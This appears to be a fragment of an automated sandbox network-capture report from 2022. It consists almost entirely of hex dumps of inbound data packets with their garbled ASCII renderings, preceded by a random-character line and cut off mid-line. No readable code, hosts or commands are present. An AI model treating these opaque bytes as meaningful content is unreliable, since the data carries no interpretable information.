Ol'4CmH>&&D{6Y~dA-iMIw`<>"sVN\|13Q8iP[B{u)\":rWbZ5H[r$,rDRE=x/pJqS\SyO>7XxgDc%Zb+g1iB%a9GtD!%
2022-05-30 12:45:08 UTC	41	IN	Data Raw: 49 9e 67 78 18 ae 65 52 c0 bb a2 6a 80 7e 64 c6 83 03 5a 49 4f 46 aa 90 b8 55 90 56 0c 6c 80 c0 18 1d a7 e9 56 62 c8 c6 08 7c 53 76 24 0a ab 76 f7 44 06 f9 4d 74 c0 c6 40 94 ad ca 49 c9 2b e8 6b c7 0f b1 38 87 f0 79 93 4c 8c 15 8b cf 5c b4 32 b2 90 57 b8 4b 4b d7 d5 68 2f f1 a8 2c 9c 10 48 35 40 97 6e 6e 9e 80 dc 18 2e ec 3f 31 dc d8 f3 60 0d 3c 77 b3 04 aa 6b a5 15 4f 62 b5 66 5c b5 06 23 c2 86 47 73 e3 ba 1f a8 b9 b9 96 5e 6e 17 11 2b ab 4c 4e c0 74 18 a9 eb 17 a4 79 92 46 e9 c2 b5 05 ec 24 88 62 99 17 71 d7 e9 2a cd 99 5f b2 d3 bc 00 54 ad 9e e3 ff 44 0f 2e ad 81 94 55 15 80 6e a9 0e 12 b1 72 61 9a 64 50 6e 5c b1 8b 3a 1c cd 45 16 58 91 14 aa c1 61 76 3b b8 d0 04 e8 f0 4f af c4 90 6f 00 2d c4 0d 68 02 fb 5d 0d b9 e0 15 d5 54 f8 8b f2 3b 8f 67 8d 2a f3 Data Ascii: IgxeRj~dZIOFUVlVb\|Sv$vDMt@I+k8yL\2WKKh/,H5@nn.?1`<wkObf\#Gs^n+LNtyF$bq_TD.UnradPn\:EXav;Oo-h]T;g
2022-05-30 12:45:08 UTC	42	IN	Data Raw: 23 b3 b1 b9 0a 54 5a 68 b3 02 5e 17 b3 5d 2a 98 f8 ce 4e 6d 3b 8c e9 25 a4 43 85 27 8c ca 53 15 42 a3 88 23 36 11 84 2a d3 7e 50 69 6a f5 61 1f c8 a4 97 8b 77 d3 62 c2 76 ba 84 24 f3 48 69 75 11 91 65 35 6b 27 7d fa e5 e4 33 ac 16 ea 65 de c0 53 dd 68 20 77 2f 43 1e 5e 0b 3b d2 f3 01 c4 e7 6a f7 6b f9 c7 25 7e 28 30 92 1d d5 ba 68 cd 1f dc c4 e1 d9 ec d4 f2 5f 4c fe 59 0f 63 d1 17 14 f3 ce ae 36 2f f5 5d 8b 24 be 73 b4 a3 d2 bd da 50 bc 2a f9 23 f7 f3 d4 66 96 5f 1d 5c 28 ee 21 ee 4b 71 e0 6e 31 cb 00 9c 1f f3 3a c1 10 a8 57 aa 81 8d 50 16 69 a4 30 d8 b2 6f 00 9e 42 de 78 af 71 b4 77 bd 41 1b 7f 8e 56 f3 95 aa 2b e6 22 a6 e5 15 c9 99 e1 d3 1e 14 ea fb 28 f4 fd 42 40 cd fa be 5d 4b 31 ef b6 83 97 d9 e3 03 e0 dc 36 d1 a6 2e 08 72 63 a6 1a 70 97 ad 60 44 0e Data Ascii: #TZh^]Nm;%C'SB#6~Pijawbv$Hiue5k'}3eSh w/C^;jk%~(0h_LYc6/]$sP*#f_\(!Kqn1:WPi0oBxqwAV+"(B@]K16.rcp`D
2022-05-30 12:45:08 UTC	44	IN	Data Raw: e7 1f fa 0b 3e 57 06 b8 5f fe c2 9c f8 94 e5 94 39 19 49 35 b1 75 de b9 36 24 6a df 27 80 54 15 d1 75 bc d5 7f 24 41 fa 16 64 17 dd 49 73 52 6f 87 d7 3e 1b 1b 3d 5d 5e 27 13 d9 cd 37 e4 22 29 25 bb 12 fb ed af 6b 9b a3 bf b4 9e 8f a4 15 30 df 82 bc 1a 05 b5 92 21 e9 10 a9 45 fc 6b c9 b9 13 dd 3f 86 97 2c 79 b0 67 6c 77 f2 5a ae 92 1b d3 38 9a da 91 cd c6 4e c1 b2 f6 20 33 63 2d 8b 97 e5 d3 c6 44 56 eb c6 37 1c 4c a6 09 fa bb 7f 44 1c c4 ed 5a dd 2d 22 41 5d fa 57 fd 2f 57 6d 21 57 e9 f2 5d 81 da 96 ae b1 99 f5 4f b2 61 bc a8 c7 bd bb 7f be 75 8e 38 9d 8f e3 c0 c7 aa ac 42 68 82 8e 31 26 6b 1f ba 4f 43 c1 c0 83 21 72 3f 54 52 47 c0 35 88 4e dd 06 a9 45 13 f1 3e b8 15 59 9f f5 11 45 c8 6d fc 53 bc 9a b1 c3 03 54 71 fb d4 d1 3d 25 4a 9a cd 81 a6 ac fb c9 07 Data Ascii: >W_9I5u6$j'Tu$AdIsRo>=]^'7")%k0!Ek?,yglwZ8N 3c-DV7LDZ-"A]W/Wm!W]Oau8Bh1&kOC!r?TRG5NE>YEmSTq=%J
2022-05-30 12:45:08 UTC	45	IN	Data Raw: 34 05 e1 e9 86 b2 e3 38 2c d7 2f 9b 58 1b b0 90 57 6e f4 21 4c 55 17 94 34 87 24 f9 35 50 dd a5 9c dd c7 6a 01 5c 12 5c 24 3e b2 30 cf fa 0a 28 08 fc c6 f0 31 9f f0 fd 27 98 ce 80 04 3e d6 c0 7c 7b 4f f6 91 09 62 6b 25 56 4a 1b 89 8d bb 33 99 ba 1e 3f 83 bc df 90 f8 a6 fa 0f 36 0c fa 84 5b 04 8a b0 b9 4a a0 82 0e 4d 56 82 6d 11 7f 1b 34 e8 e6 70 32 49 f0 44 05 2d 2f 4d 21 90 b9 97 85 f7 c3 fa 31 43 4b 23 e9 45 cf bc 2d 16 d3 e3 b9 05 b2 91 ea 03 96 12 61 9c 8a b6 b1 3c 8a d2 6b 73 c4 f8 47 98 27 e0 98 73 4e af a7 2c 3d 94 3f 55 d8 20 32 0d ef 48 93 0c 8e 8e 0b 29 e1 3e 02 6d 9b 47 3c 1c 85 28 c8 79 11 e2 72 a0 2b 41 bc d8 a0 29 a5 15 70 39 5f 90 19 ee 83 93 a9 f1 97 e6 c0 02 b7 f2 ff d7 51 94 3b b4 cb 78 2b fa 44 6b 84 15 46 a1 84 59 28 58 01 3e 90 9b 20 Data Ascii: 48,/XWn!LU4$5Pj\\$>0(1'>\|{Obk%VJ3?6[JMVm4p2ID-/M!1CK#E-a<ksG'sN,=?U 2H)>mG<(yr+A)p9_Q;x+DkFY(X>
2022-05-30 12:45:08 UTC	46	IN	Data Raw: f6 5e 27 40 33 64 90 02 cf d7 15 52 c9 53 01 ec 7f 87 41 8f e2 8c 09 86 ea 7d b3 82 28 d3 87 37 66 aa 81 75 7e 7c 3d 92 1d b6 bd 65 2c 70 7a 6b e7 44 d4 b1 66 20 b3 82 16 cb 6a 5c 8a ec cb 9b d5 ed d2 78 10 5b 9c 13 f2 5e e4 1d b5 32 33 b7 bc b8 b3 58 f3 91 2a d5 1a 1d 59 17 8e 80 51 1b 31 1f 6b 45 c5 83 cf de 52 75 42 73 7c a8 65 5b 94 73 cc 15 c3 1d 17 3c 42 20 0c c4 aa 9c cd 72 58 6f 36 06 b8 d3 7a 7e 0c 82 88 ab cf b5 ce a7 12 c9 14 d6 f6 39 d0 f2 76 35 e3 c3 6c e6 bf 49 10 8e e7 61 62 a3 5b 84 52 15 5b e4 d1 a8 b9 ca b3 9e ff 47 96 48 de 1d 8a 5a a1 87 13 d8 e3 17 17 78 bf fd 7b cc 8c 27 a2 a0 a7 43 df c8 2e fe 8b ec 89 de df cf 66 99 b9 29 06 27 60 04 e2 6c 0d ed ca aa 38 1b fa 98 5d 27 09 e3 58 b0 91 32 12 62 96 36 67 50 14 86 fe 78 bf 7e e3 3f a5 Data Ascii: ^'@3dRSA}(7fu~\|=e,pzkDf j\x[^23X*YQ1kERuBs\|e[s<B rXo6z~9v5lIab[R[GHZx{'C.f)'`l8]'X2b6gPx~?
2022-05-30 12:45:08 UTC	47	IN	Data Raw: 5b 77 22 27 3c 4f 5b 77 b9 98 0b 79 cc d1 73 2b 73 53 23 7a b9 df cb 42 17 f5 b9 70 46 25 50 02 28 db 12 53 c4 28 44 f0 2a 26 bd 0e 50 6b 69 ec 91 6d 3d 35 b8 bb c0 45 ec fb 89 18 60 db 1b 63 d7 94 db a7 8a 6f f5 55 dd 7b 80 52 d1 36 af b0 74 ff 62 b8 75 c7 2f 49 23 5a d2 85 46 9b a8 e9 3b c9 3f cd 98 97 b1 73 a5 50 ed 27 39 00 33 1e 70 fa 83 07 55 6f cd 02 ae f8 7f 4f 29 42 c7 82 5f c5 7b 24 a7 52 b7 f2 51 da 4e e9 17 7b 08 35 b8 4b fd 88 be 8c f9 56 43 8e c4 f9 6c c9 0d 2d 87 11 37 dc 36 c4 5d 89 41 06 ae b3 5a 81 87 61 42 66 64 6e 86 89 2f 0f 3f 72 c9 a1 8e 8c 6e 80 57 6d 37 28 2f 6c 66 ce 44 86 9c 37 81 f0 99 7a 3e 9c 97 03 8b f7 6b 7b 0d d7 50 6f d3 ba 2a 76 ba 59 23 18 28 c2 f4 ee 86 82 93 1f 28 18 f9 40 bb cc 27 00 89 cd 5f fc 75 4a 67 63 68 70 90 Data Ascii: [w"'<O[wys+sS#zBpF%P(S(D&Pkim=5E`coU{R6tbu/I#ZF;?sP'93pUoO)B_{$RQN{5KVCl-76]AZaBfdn/?rnWm7(/lfD7z>k{PovY#((@'_uJgchp
2022-05-30 12:45:08 UTC	49	IN	Data Raw: b5 30 35 6e 1f bd f1 fe ad c7 fe fd b8 d1 50 e3 61 01 54 cc bc fc 4e e6 d7 16 81 3b ee 4f 04 3e d8 46 b5 72 92 47 fe ac 5a 49 d2 73 b9 e0 00 97 6c 61 1c 2b 81 fb 4d 1c 75 32 c7 67 31 1b ca b6 e6 8c 83 1d 18 e1 1c 3e 68 a6 32 b1 b5 da ce 38 7e 99 a5 30 c9 58 d7 3d 11 a9 fe 05 6e 27 43 d8 be 47 98 26 30 68 60 d9 20 4a 02 dd 8a ac bd 9d a8 39 a2 5e 05 df 83 c2 66 11 4a c2 ec 15 b3 a0 fb ac 90 4e 66 b4 1a cb 16 b1 d3 59 f0 15 7c 88 7d 4d a5 8e 88 bc f5 51 d6 9b 78 03 34 3f 2a e0 19 b7 f2 ff d5 79 34 45 fb ef 6f f1 5c 02 62 68 0e 1f 1f 9f 42 30 b1 fc eb 5c 73 e4 17 c2 c4 25 cb b2 11 3b 57 ef 15 38 22 d8 5a 32 47 e2 27 bb 26 e7 da ef 87 9f 1a 35 ce 60 f8 26 77 d9 5a 9d 44 26 b9 93 61 e4 08 ff 98 07 5b 77 68 6d cc 21 f6 39 58 a1 aa 3f 13 a5 ba 42 77 0e 20 7a f7 Data Ascii: 05nPaTN;O>FrGZIsla+Mu2g1>h28~0X=n'CG&0h` J9^fJNfY\|}MQx4?*y4Eo\bhB0\s%;W8"Z2G'&5`&wZD&a[whm!9X?Bw z
2022-05-30 12:45:08 UTC	49	IN	Data Raw: 38 61 ff a2 07 42 18 c0 45 f8 db fc b7 e4 91 88 cd 84 19 bc 81 1d c4 a3 f6 79 b5 e7 43 4b 5a ff 01 73 6e 7d fd ca 93 7a 12 f4 1a 78 7e df 18 3b 7b c3 03 03 ca 8f f0 23 86 bf 20 02 89 a0 36 dd ff ae 5e 5d 7c 91 51 16 8c cd 04 de 75 07 96 e8 0e d5 9f e3 59 9f 52 e8 ab 81 f7 3b 15 80 67 a9 0f 12 2c 7c 61 9a 64 51 82 f5 5e af 90 1e cd 37 04 16 9b a4 36 c9 7b d4 75 a2 7f cd c6 68 a7 fd 81 f8 af 3a 6b c4 80 af e8 81 5c 22 c2 e0 15 e8 9b 01 4e 1e a6 4e 06 71 94 fd cc 38 b8 f7 f5 c2 2a cf 51 36 3c ab 5f fa 54 fa 14 76 71 1b 6e ca 0f 84 10 67 07 c6 f6 96 a4 41 dd 68 0b ba 55 c8 e3 74 bb 1a f9 5e 77 dc 5a ea 96 66 83 64 0a 62 4f 5a 1d 1f 4d 73 18 4c b9 c3 9b 71 b1 c5 70 84 44 9a 37 04 c4 b7 fc 61 d8 25 54 e7 53 ce 12 f5 a7 ec 68 22 e5 74 b1 cb b4 9d 0d b3 94 a1 67 Data Ascii: 8aBEyCKZsn}zx~;{# 6^]\|QuYR;g,\|adQ^76{uh:k\"NNq8*Q6<_TvqngAhUt^wZfdbOZMsLqpD7a%TSh"tg
2022-05-30 12:45:08 UTC	51	IN	Data Raw: 85 25 ff ae d9 2b e2 d4 fd a5 cf 1f 0e d0 48 9c 6a b7 cb df c3 05 2d ef 11 e8 db ec 70 d5 af 36 89 bf 16 33 ed 02 0d c0 9a 01 32 3a b8 2c df ea 57 e2 04 42 ae f4 99 fd ce 61 da 0c 9a 17 21 81 e3 45 cd 03 09 12 87 46 0c 0e 68 27 da 92 db f6 cb 02 e2 d5 ac 81 57 48 a4 19 98 93 28 bf bc 87 9e 72 8c c4 f0 b0 65 3b d8 d9 5c 39 1e 4c 3e 3f 58 50 5f d0 28 86 7b 8d 98 e8 18 c1 62 6d 70 83 56 ba e1 33 a8 b5 af f0 7f 5c 80 39 a4 8c 38 a5 b9 80 57 51 f4 9f 45 30 a1 66 c3 bd c9 a7 99 78 73 97 93 15 f3 30 de 06 d5 f0 39 8c c6 eb a4 1f b5 bb 64 14 89 8e 2a 9e e3 18 13 40 05 6f 4c f9 09 71 11 4b 63 8f 79 8c 3a bb 3e 3b 28 e2 91 eb e2 4b 3f 54 29 82 39 e4 73 e2 95 b1 0a 0b d5 1f f0 58 d8 85 9a 04 11 cb 00 90 c0 15 01 d6 23 46 4a fd 35 dc 86 b0 47 08 1d 31 32 93 50 92 a7 Data Ascii: %+Hj-p632:,WBa!EFh'WH(re;\9L>?XP_({bmpV3\98WQE0fxs09d*@oLqKcy:>;(K?T)9sX#FJ5G12P
2022-05-30 12:45:08 UTC	52	IN	Data Raw: 12 49 a7 65 fb fc 16 52 8a 62 55 47 af 45 42 ef cd 5a bb 38 70 11 05 f5 61 2d ff 18 67 07 9c fd 10 eb ae 47 0e 1d f7 6c f9 ea 7e 44 60 6c 9f 62 12 2d 73 a1 5d fa ec 22 52 bb 3f 22 57 dd df 38 39 25 81 72 16 73 32 87 27 89 78 2b b3 04 6f 7e ce fe 74 2f 10 9a 51 ef 45 e4 5d 72 7f 23 8c 1e 54 ad 6f ba 8c c2 3e 3f 88 d1 9a 83 29 45 31 45 fd 60 e2 0b 8d 66 20 4c 1e 4a b7 76 2d 0f 5b b6 37 7a ed ad a8 10 23 4e ae df f8 81 87 52 cd 3d 26 ca 55 83 38 59 ce 45 de ce 86 fe dd ce 46 0e 1f d4 e8 93 e4 17 65 29 be fb e8 e7 bb a1 8d 47 5c 23 e2 82 cc 7b 7f f1 7c cc f4 42 7b 89 4a 41 aa c8 6a 84 f4 06 ad b8 05 1f 5c 5d 9d 66 43 33 d8 6a 62 26 f9 83 b2 22 98 ec 2b 85 d7 9a 5a e3 c7 0f e0 7d a3 1b d1 77 e4 13 7e a5 2e 3c 52 8a 77 0d f8 42 27 8b d3 6b 93 1f f4 d4 e9 77 4c Data Ascii: IeRbUGEBZ8pa-gGl~D`lb-s]"R?"W89%rs2'x+o~t/QE]r#To>?)E1E`f LJv-[7z#NR=&U8YEFe)G\#{\|B{JAj\]fC3jb&"+Z}w~.<RwB'kwL
2022-05-30 12:45:08 UTC	53	IN	Data Raw: e3 97 dc 36 57 d5 16 19 5a b0 f6 03 3f 58 d4 b2 5a a6 a5 fc 2e ad 81 68 95 15 80 bc ea 29 63 df 7c 61 5d f1 69 15 16 7c cc 77 6b 2f bd 90 3a 99 14 29 10 61 76 3d 3c 1c 43 52 91 b0 c5 e2 41 e3 c6 2d c4 0b d4 ce f4 e7 95 c2 94 22 55 7a be 32 0d 3c d5 ce cd e6 b2 17 29 2e 7a fd 92 9b a9 15 1d 13 6e 98 1a 65 58 4e 2c 59 f2 15 8c 6c c6 1f 5a fc f5 60 4d 05 9a f3 d1 95 3a 2b 92 4c fd 60 4c d6 48 33 dc db cb 64 a1 94 f5 57 75 7b 9e d7 f7 32 df 91 a7 69 ad 2b 4a db b0 a5 89 21 08 6e ab 34 8a 70 ad c2 26 43 a7 58 e1 ab 08 2d 68 6c a9 46 ca 84 ee 6f 6e b5 bb 2b d7 49 a1 62 42 31 15 04 6b 6f 79 29 60 71 74 d1 a0 fe d9 8f 83 e2 2c 98 79 b1 33 bd 95 f2 3a 48 65 2a 8d 9b 39 10 ff 70 46 dd 46 61 1d 9b 4a c3 71 ac 1d 1c 53 a2 e5 14 04 8a a3 c4 d5 7a b6 d4 9e d1 2e e8 1e Data Ascii: 6WZ?XZ.h)c\|a]i\|wk/:)av=<CRA-"Uz2<).zneXN,YlZ`M:+L`LH3dWu{2i+J!n4p&CX-hlFon+IbB1koy)`qt,y3:He*9pFFaJqSz.
2022-05-30 12:45:08 UTC	54	IN	Data Raw: 31 74 1e 03 f3 37 e7 24 67 8a a3 06 36 bf ce 8c 2c 53 7e ef d4 46 fb 21 1e e9 d6 70 87 d6 c0 8c c4 71 56 0c 82 27 d9 55 f9 66 4f c0 84 66 ad 5f d1 f4 e2 9e ac 51 ea 18 b3 7e 21 5c 76 a0 13 0a eb 10 4f de 2b 44 08 e8 65 51 77 75 b1 8d 86 fe 28 5e 7f ef 17 5e f3 2b f8 de 33 9b fc 7f 89 a7 2e 4c 80 42 bf 2a 82 77 ac 02 64 e5 13 21 bb 82 ee 76 71 56 b6 7a 26 12 f4 dc 8c 75 f2 8c fa 07 83 c1 71 5f 4f e8 aa 48 3d f5 e2 0b 64 96 6f df d2 5d a2 b2 1d c3 ca dc c4 2e 55 9a 9b d4 17 ab b5 11 a0 14 d8 e8 22 bc 2a f1 d8 e8 62 4e 3f 5b db 6e d3 95 4a 3c 9f 90 37 19 37 2e dd a7 8c 7c 80 a2 e5 6c 4a e1 6c 14 03 2f b3 3b 19 1d 56 42 2a 69 7c fd 7c df 47 a7 af d6 12 41 1a e3 eb 86 34 9b d5 92 f0 c8 24 41 cd f2 b5 ff 51 1f 32 85 ae e7 9f 01 08 71 64 c2 b0 65 1c a6 44 2f 4d Data Ascii: 1t7$g6,S~F!pqV'UfOf_Q~!\vO+DeQwu(^^+3.LBwd!vqVz&uq_OH=do].U"bN?[nJ<77.\|lJl/;VB*i\|\|GA4$AQ2qdeD/M
2022-05-30 12:45:08 UTC	56	IN	Data Raw: 8b be 07 f8 b0 b5 24 39 97 65 fb 43 0e f1 5d 2e 99 46 e7 f3 d3 79 7d 72 6e d1 0f e2 95 8f 2e d3 44 6c 54 29 db 43 16 65 7c 60 89 b0 a3 01 30 77 ff 56 41 ef 53 49 b5 c3 3b bb 25 0e ee 43 54 55 f3 9a 3a 9a c5 84 36 c9 51 75 38 c9 35 c8 22 91 15 a1 2f 04 89 bd 39 1d 8a 23 21 83 f0 d3 d9 91 97 28 01 41 de ff 7c 2e 4e 62 f7 b1 ee 28 9f 2e 96 1f 75 68 9c 4b b8 c4 9b 13 e3 45 2b db 18 b0 49 3a 06 b8 42 05 1f 89 57 7d 64 4d 33 53 24 71 26 c7 eb 62 1c 68 86 77 20 e2 a8 7e 1f e5 97 e0 f6 0c c7 c6 eb 97 f8 69 c1 4a c3 d9 8a df 31 73 db 44 ee 08 da 68 7c 3d 33 3a 20 36 c1 a7 d0 be 17 f9 96 9a 9d 19 cd 75 b6 f8 d0 dc 44 0d 15 9f 09 7b c3 33 3f cc 8b 92 3b 87 81 46 13 5e 2d 41 ac ba 46 11 d5 77 3a a0 61 87 0e 36 86 0e 77 70 6c 41 2d a6 b3 56 36 7d 4a 16 c1 7d 76 07 20 Data Ascii: $9eC].Fy}rn.DlT)Ce\|`0wVASI;%CTU:6Qu85"/9#!(A\|.Nb(.uhKE+I:BW}dM3S$q&bhw ~iJ1sDh\|=3: 6uD{3?;F^-AFw:a6wplA-V6}J}v
2022-05-30 12:45:08 UTC	57	IN	Data Raw: f5 6e ce a2 fc 95 c2 94 22 55 45 b5 32 0d 3d 8f 67 95 e9 62 16 ab 33 37 b1 b6 f2 11 2e 87 3c d7 67 85 93 e2 05 67 d6 be 68 17 7c 9e 42 20 0b 39 5f e2 bd e4 c8 87 71 f7 67 e6 34 89 47 1a 2c df 8a 23 3a 26 b0 31 21 49 8d 6f d9 d6 f7 2c 5d 73 91 d3 99 5d 55 2b 4e 63 a5 2b ed cf b2 18 ef 29 33 9d fb a8 54 83 7a 33 ed af 26 ab b7 5c ac dd 4d f3 db 9e 80 77 e8 7a f3 4b 20 10 d9 94 ee ec b4 87 11 eb 96 80 9c 44 8d 95 23 97 2b 83 8f bb 20 e8 5a 24 a8 36 1d ee 96 65 c2 b9 01 74 61 93 0c b2 9e 90 52 ae af bd 0d 80 0b cb 08 e9 d9 c9 45 1b ef b8 d5 c9 d7 cd 15 38 c8 5d 82 07 5b 05 26 8b 24 b4 d2 45 99 a9 14 f7 d8 2c c7 a1 0f b0 f4 d1 a7 68 64 e9 62 c9 2d 02 6a 5d fa 8e 47 c2 f2 6a 98 07 e9 32 15 2f cd 94 22 b1 73 94 55 73 a1 4c 60 38 03 bd 35 58 74 21 d7 46 c4 f1 4e Data Ascii: n"UE2=gb37.<ggh\|B 9_qg4G,#:&1!Io,]s]U+Nc+)3Tz3&\MwzK D#+ Z$6etaRE8][&$E,hdb-j]Gj2/"sUsL`85Xt!FN
2022-05-30 12:45:08 UTC	58	IN	Data Raw: 04 03 09 48 cc 7d 51 88 76 b1 8d 82 f6 28 22 1a 01 7e b9 5c 4e 11 4b 2b cb 90 0b 25 6c 80 aa 81 d9 39 5f 21 04 cc e2 44 6e 67 52 7b 10 2d 77 f8 a9 62 d1 5b 38 80 45 23 f2 6e 19 05 db 2f cc ce d8 94 be 75 26 4f 86 39 bb 68 13 90 38 58 76 5d 4d 6f dc aa 38 e8 70 0a 9c c2 ad fc 2a 71 01 8a 39 c3 63 4e 1c f2 75 19 43 76 a5 d4 b2 30 db 24 13 5a 6b fc 4e 5f ce 43 64 9c 0b 49 21 70 0a 75 60 44 a1 d7 25 67 eb 09 34 18 b0 72 12 a1 1a e0 d9 17 5f b0 9b c9 0c d0 92 f2 f8 a6 f2 97 32 99 3d cc 67 f8 22 0c ae b2 f9 dc 53 9d 1f cf 0d f6 da 7e b0 cc f2 f5 a8 60 f7 b0 db 20 a3 1d 79 fc 13 00 27 5e c5 c1 7c f0 94 ee 2f 95 3e 58 7d ce c5 c7 26 43 16 58 89 ac 81 70 98 89 b6 a4 0b 48 25 46 a7 74 f0 07 b8 9e 2f e0 b0 a7 e2 d3 b4 2e 19 3f e9 55 9b a1 e9 e2 a5 9f 67 95 e9 5a 17 Data Ascii: H}Qv("~\NK+%l9_!DngR{-wb[8E#n/u&O9h8Xv]Mo8p*q9cNuCv0$ZkN_CdI!pu`D%g4r_2=g"S~` y'^\|/>X}&CXpH%Ft/.?UgZ
2022-05-30 12:45:08 UTC	60	IN	Data Raw: 69 4f 15 a3 ab 8f 77 ac 09 85 32 75 2a 93 8f 2e 1b b0 de df dd 01 22 2f 3e 8d 55 ab a4 a4 66 c7 6c 57 29 41 b8 82 23 ff fb e5 df bb 87 db 68 0d dd 97 24 10 d3 5b ef 8b 45 57 6b 2c 2b 0c 0b 9b 62 11 8f e8 28 e0 89 9b 6e c0 d8 75 69 52 43 ff 62 9c 95 79 2e d1 fd 30 1c 0b e7 27 53 0b 6e 93 98 7b 5f aa 81 7a 9f 62 1e 5d 5b 79 2d d6 44 fa d8 56 64 94 6a b7 cb 77 30 7f 9e df 9b 98 cc 03 73 08 b9 fb 88 87 ef a4 ba 08 3e 82 d7 a1 74 f2 b7 3d ad ee ea 0e 0e c1 1b e7 d3 98 19 e7 de f9 7b 5c 5b a2 a0 ff 6b cc 8b e1 78 b8 85 a7 f7 e0 fb 38 ba ea 62 bc c3 d9 d0 00 4b 20 fd 40 b4 d3 5a 87 54 90 43 85 9b 56 a0 12 f3 fe 1c 58 9c 1d 3a 97 78 c8 c9 d9 1c 75 ce 0d 89 9a 91 50 1f b5 fc 55 dc 31 12 ba 0a bb a8 4b 54 0f 80 55 b8 ee 77 22 a3 b3 8d f4 3f 41 ce 7f 66 8f 5e f3 48 Data Ascii: iOw2u*."/>UflW)A#h$[EWk,+b(nuiRCby.0'Sn{_zb][y-DVdjw0s>t={\[kx8bK @ZTCVX:xuPU1KTUw"?Af^H
2022-05-30 12:45:08 UTC	61	IN	Data Raw: e0 10 36 09 05 ee 73 86 15 1f 77 fc b5 2b 58 b9 37 7c 71 b1 ca c6 d1 d7 d9 3f 0d 92 5f 00 95 3c 33 bc 9b 8a 6b 25 e9 fe c6 27 6b b2 22 b9 53 a8 c2 68 24 4a 4f eb d5 5f 9b 9c 01 3c b0 e6 a4 cf 53 0c 2f 76 26 16 c4 37 5b 08 f8 98 0b a4 9e e0 9d c8 9c c3 24 7e 37 50 66 13 1b 13 b3 67 26 49 6f 28 55 0d e5 ab 30 e7 97 c5 9f fe c9 c7 74 f7 dd 6d 3d 28 f6 f8 82 a0 32 0c f3 f6 81 5b 9f af a9 de b4 3e 81 14 51 b8 d7 67 e3 64 64 c5 08 f6 07 7f 71 18 62 05 ec 37 b1 40 c3 89 7f b7 a6 21 b3 ef 32 29 f6 60 81 ad c3 c1 71 e4 16 63 39 68 3e 49 8a 12 b4 89 71 c7 49 c2 db 18 45 c7 89 54 c3 0e db e1 22 53 5b d9 e4 11 89 c4 0b 22 72 dd fb 52 47 6e 3d 61 88 00 85 51 88 2a 39 3e 0d 15 6e aa ee d5 06 f9 e3 6b d4 fe a3 38 1e 7e 23 f5 30 3c ca 7d 01 65 a1 d5 c7 a9 f3 4d 66 10 9c Data Ascii: 6sw+X7\|q?_<3k%'k"Sh$JO_<S/v&7[$~7Pfg&Io(U0tm=(2[>Qgddqb7@!2)`qc9h>IqIET"S["rRGn=aQ*9>nk8~#0<}eMf
2022-05-30 12:45:08 UTC	62	IN	Data Raw: fa 4f e1 2a 90 90 e9 f3 9f bc 2c db c7 4e 90 dc e8 97 b8 2a 56 e9 9c 3f 4f 15 67 ee b7 b1 03 9c 0e d0 55 2c a2 98 ca 4c 4b 12 57 18 9f bd f2 c3 88 b9 b3 0e fc a5 15 4f ee c9 80 28 a5 6c 4b d8 97 8a 75 e5 be 3f 97 9f 9a 86 56 6e 6b 7e 7e dc 47 95 72 f7 30 c8 ff f8 a6 79 cb 49 df ed 2b a6 b1 6a 7c e3 5a bf dc 90 9d 94 7a 8a 59 ff 08 9c dc cd 39 9d f5 27 3d 20 5a 48 20 ce 2e df 8d c8 dd 97 44 e4 55 d8 65 62 d2 a2 62 01 b8 46 b2 b9 06 b2 cd c1 03 96 c1 72 91 3b b0 d0 1c 81 53 4e 62 82 f8 47 9e a7 94 f4 2d ce 6f 85 95 c2 75 9c 56 17 05 6a c2 49 3c 29 f4 49 64 af a1 69 45 02 f8 c3 91 9c 39 83 28 13 3c 37 cb ea 2c 2b 33 7d b0 8c 3f a4 cd 2c 39 5f 48 de 26 18 9c 76 f9 c7 96 91 4e 93 fe 21 cd 22 57 cc e8 62 28 70 42 ee e0 b4 ea e0 e0 63 a8 91 4d f9 f7 1b 73 3c d0 Data Ascii: O,NV?OgU,LKWO(lKu?Vnk~~Gr0yI+j\|ZzY9'= ZH .DUebbFr;SNbG-ouVjI<)IdiE9(<7,+3}?,9_H&vN!"Wb(pBcMs<
2022-05-30 12:45:08 UTC	63	IN	Data Raw: e0 5a d9 51 6c 4a 9c 71 ff 53 52 23 cf ca 67 97 8e f6 6b dd 2b 82 54 30 00 dc 01 c4 fb 6a 14 6a b9 d7 72 9d 0f ad 87 21 32 c4 e3 db 1c 6b 1f 29 b4 b7 f4 b3 64 97 11 5b 9b ca b8 17 ed 66 e9 ae 44 23 60 99 1f e8 6c 86 80 b4 4f 0f cd 47 f2 09 3a 57 5f 8f a5 66 e0 1a 2e 19 a8 12 7c 35 72 b2 67 6b b8 df a7 44 78 bc 75 44 73 58 aa ea 97 76 b4 b0 5c 48 28 53 f5 42 28 03 cc 55 c5 99 7b 1c 4b 2a 65 b9 c6 67 ef 78 a8 51 10 3d c9 c5 69 fa 03 67 ad 2d 16 84 d6 66 ee d4 9e a3 1a 26 8c 78 ba 08 83 4e cf 68 b6 69 82 8c 1b d3 ad ce fa b5 1a 56 2f 39 c2 de 54 bb a5 5e 89 03 5a eb b4 9b 78 bf 76 c7 5b ef 53 19 dd 3e 84 87 ac de eb b8 37 ff 07 b7 fb ff 25 f9 62 70 9c c9 a8 2d cc 86 a1 ee e2 db 2e cc 61 5d 4f b1 f8 9b 77 0d ce 42 bf e2 6b 3c 05 b3 aa b9 48 d6 0d e3 3f d1 a8 Data Ascii: ZQlJqSR#gk+T0jjr!2k)d[fD#`lOG:W_f.\|5rgkDxuDsXv\H(SB(U{K*egxQ=ig-f&xNhiV/9T^Zxv[S>7%bp-.a]OwBk<H?
2022-05-30 12:45:08 UTC	65	IN	Data Raw: 4f e8 4f e6 90 f3 39 14 20 dc f4 ef e5 7d 84 d0 64 7d 82 74 93 66 21 cb 13 3f ab a5 17 d7 eb e5 88 cd 6e 67 1a 53 fc 6c 19 4d 0e 3a 1f 50 ba 94 bd c9 46 fe ab 4d 09 37 c0 35 78 63 28 1a c5 a3 bb 25 bf 25 c3 e2 38 82 ac 29 e3 58 8f e1 94 eb 53 11 f5 01 6c 86 31 8c 4e 1e 4f 78 ef 17 58 74 2b f6 22 3a 77 26 b8 25 fa 0f 9e c6 eb 77 2c b3 3a 7a ed fa c0 46 52 9a 3b 7c f7 a2 b2 1c c0 33 03 50 d9 58 61 11 13 86 d8 4e 02 9c c4 da eb 31 3c e5 eb 47 e8 7f 55 37 a1 cc 75 3c c1 6e 28 e2 b0 32 7a 42 91 10 b1 54 c5 89 1d a6 85 87 c7 4c 76 9d 04 29 d2 4c e6 6d 08 f6 8c e6 02 e7 27 3c 91 d0 20 fb f9 eb d4 35 21 a4 38 28 7a 